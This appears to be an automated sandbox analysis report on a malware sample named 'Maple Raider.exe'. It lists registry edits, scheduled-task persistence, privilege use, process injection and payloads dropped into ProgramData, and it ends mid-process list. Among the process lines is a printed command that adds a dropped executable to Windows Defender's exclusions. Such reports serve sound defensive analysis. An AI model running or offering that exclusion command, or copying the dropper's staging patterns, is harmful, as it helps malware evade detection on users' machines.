Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732035469" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\main.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 212 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe
PID 212 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe
PID 4988 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe C:\Windows\system32\cmd.exe
PID 4988 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe C:\Windows\system32\cmd.exe
PID 408 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe
PID 408 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe
PID 408 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe
PID 3216 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe C:\ProgramData\Microsoft\hacn.exe
PID 3216 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe C:\ProgramData\Microsoft\hacn.exe
PID 3216 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe C:\ProgramData\Microsoft\based.exe
PID 3216 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe C:\ProgramData\Microsoft\based.exe
PID 3980 wrote to memory of 4844 N/A C:\ProgramData\Microsoft\based.exe C:\ProgramData\Microsoft\based.exe
PID 3980 wrote to memory of 4844 N/A C:\ProgramData\Microsoft\based.exe C:\ProgramData\Microsoft\based.exe
PID 4796 wrote to memory of 648 N/A C:\ProgramData\Microsoft\hacn.exe C:\ProgramData\Microsoft\hacn.exe
PID 4796 wrote to memory of 648 N/A C:\ProgramData\Microsoft\hacn.exe C:\ProgramData\Microsoft\hacn.exe
PID 648 wrote to memory of 4924 N/A C:\ProgramData\Microsoft\hacn.exe C:\Windows\system32\cmd.exe
PID 648 wrote to memory of 4924 N/A C:\ProgramData\Microsoft\hacn.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1972 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1972 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3404 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3404 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4636 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4636 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4044 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4044 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4924 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe
PID 4924 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe
PID 4924 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe
PID 4844 wrote to memory of 4596 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4596 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2208 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2208 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4596 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4596 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2208 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2208 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4844 wrote to memory of 4376 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4376 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1584 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1584 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 976 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 976 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1972 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 3556 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3556 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 920 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 920 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4768 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4768 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1692 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1692 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4044 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4044 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4980 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe C:\ProgramData\main.exe
PID 4980 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe C:\ProgramData\main.exe
PID 4636 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 4636 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 4768 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4768 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4376 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4376 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe

C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe -pbeznogym

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe

C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe -pbeznogym

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"

C:\Windows\system32\cmd.exe

